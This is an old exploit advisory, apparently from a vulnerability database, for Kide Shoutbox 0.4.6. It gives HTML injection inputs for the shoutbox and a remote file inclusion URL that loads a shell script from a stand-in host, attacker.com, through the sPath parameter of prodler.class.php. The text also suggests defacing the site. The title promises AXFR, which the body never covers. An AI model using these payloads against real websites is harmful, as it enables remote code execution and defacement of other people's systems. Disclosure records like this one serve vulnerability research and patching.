Kide Shoutbox 0.4.6 - XSS & AXFR

2014-07-01T00:00:00
ID SSV:67109
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##########################[andresg888]##########################
#Web: : www.ilegalintrusion.net<http://www.ilegalintrusion.net> & www.bl4ck-p0rtal.org<http://www.bl4ck-p0rtal.org>
########################################################################
#Exploit :
# Go to the shoutbox and type:
# <font color="red">red text</font>
# or
# <marquee>hi</marquee>
# or
# 
########################################################################
#3xplo!t :
#http://server/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt???
########################################################################
#Greetz : _84kur10_ , Brunos_50
#Special Thanks : all members from ilegalintrusion & black-portal
########################################################################
# It is obvious that if you allow javascript or html injection code can make a document.Inner
# so with a little imagination could Defacer the site with a script.
###########################[andresg888#################################